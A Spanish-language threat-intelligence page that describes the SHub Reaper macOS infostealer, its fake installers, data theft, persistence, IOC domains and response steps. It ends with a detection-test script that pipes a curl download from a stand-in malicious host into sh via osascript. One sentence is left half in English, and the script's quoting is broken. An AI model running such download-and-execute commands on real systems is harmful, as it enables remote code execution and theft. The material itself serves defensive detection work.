SOC Prime Bias: Medio

20 May 2026 22:15 UTC

SHub Reaper | El ladrón de macOS suplanta a Apple, Google y Microsoft en una sola cadena de ataque

Author Photo
SOC Prime Team linkedin icon Seguir
SHub Reaper | El ladrón de macOS suplanta a Apple, Google y Microsoft en una sola cadena de ataque
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe analiza una nueva variante de infostealer para macOS llamada SHub Reaper, que utiliza instaladores falsos de WeChat y Miro para entregar una carga útil maliciosa de AppleScript a través de un dominio con tema de Microsoft con errores tipográficos. Una vez lanzada en el Editor de Scripts, la carga útil recopila datos del navegador, archivos de billeteras de criptomonedas e información del llavero, luego exfiltra el contenido robado como archivos ZIP fragmentados. El malware también altera los archivos de la billetera y establece persistencia a través de un LaunchAgent disfrazado como una actualización de software de Google. La detección recomendada se centra en la ejecución de AppleScript, la creación sospechosa de LaunchAgent y el tráfico saliente a la infraestructura conocida de comando y control.

Investigación

SentinelOne rastreó toda la cadena de entrega en múltiples etapas, incluida la explotación del esquema applescript:// , la generación dinámica de la carga útil de AppleScript y un módulo de captura de archivos que refleja el comportamiento de robo de documentos visto en AMOS. Los investigadores capturaron tráfico de red al dominio de comando y control hebsbsbzjsjshduxbs.xyz y a puntos finales relacionados, junto con la creación de archivos temporales en /tmp y un LaunchAgent colocado en el directorio de la Biblioteca del usuario. La investigación también descubrió funcionalidad de bot de Telegram codificada específicamente para telemetría de operadores.

Mitigación

Los defensores deben bloquear el acceso a los dominios con errores tipográficos mlcrosoft.co.com, qq-0732gwh22.com, y mlroweb.com, y monitorear los LaunchAgents creados bajo rutas que imitan los componentes de actualización de Google. Debe usarse una lista blanca de aplicaciones para restringir la ejecución de AppleScript desde fuentes no confiables y se debe hacer cumplir la verificación estricta de firmas de código. Las detecciones de red también deben alertar sobre la comunicación con el dominio de comando y control identificado y sus rutas de API conocidas.

Respuesta

Si se detecta actividad de SHub Reaper, aísle inmediatamente el punto final afectado, termine cualquier proceso sospechoso de AppleScript o LaunchAgent y elimine los archivos maliciosos de /tmp y la Biblioteca del usuario. Los investigadores deben realizar entonces una recopilación forense completa de las tiendas de datos del navegador, directorios de billeteras y repositorios de credenciales, seguidos por restablecimientos de credenciales donde se sospeche de compromiso. La infraestructura de comando y control identificada debe ser bloqueada, y el equipo de respuesta a incidentes debe comenzar una búsqueda de amenazas más amplia en todo el entorno.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: El Control Previo de Telemetría y Línea Base debe haber pasado.

Motivo: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y tener como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.

  • Narrativa y Comandos del Ataque:
    El atacante elabora una línea única que aprovecha osascript para ejecutar un comando de shell. Dentro del AppleScript, do shell script ejecuta curl para descargar un script de shell remoto (payload.sh) y lo redirige directamente a sh para su ejecución. Debido a que toda la cadena está incrustada en una sola invocación de AppleScript, macOS registra un solo evento process_creation cuya línea de comandos contiene ambos, cumpliendo con la regla de detección. osascript and curl, satisfying the detection rule.

  • Script de Prueba de Regresión:

    #!/bin/bash
    #
    # Simular ejecución de SHub Reaper en macOS
    # Genera un solo evento de process_creation que contiene tanto 'osascript' como 'curl'
    #
    MALICIOUS_URL="https://malicious.example.com/payload.sh"
    
    # Una línea: osascript ejecuta un comando de shell que descarga el payload y lo ejecuta
    osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""
  • Comandos de Limpieza:

    #!/bin/bash
    #
    # Limpiar cualquier artefacto creado por la simulación.
    # El payload se ejecuta en memoria y no escribe archivos, pero aseguramos que no haya procesos residuales.
    #
    # Elimina cualquier proceso 'sh' iniciado por la prueba (utilizar con precaución en sistemas de producción)
    pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"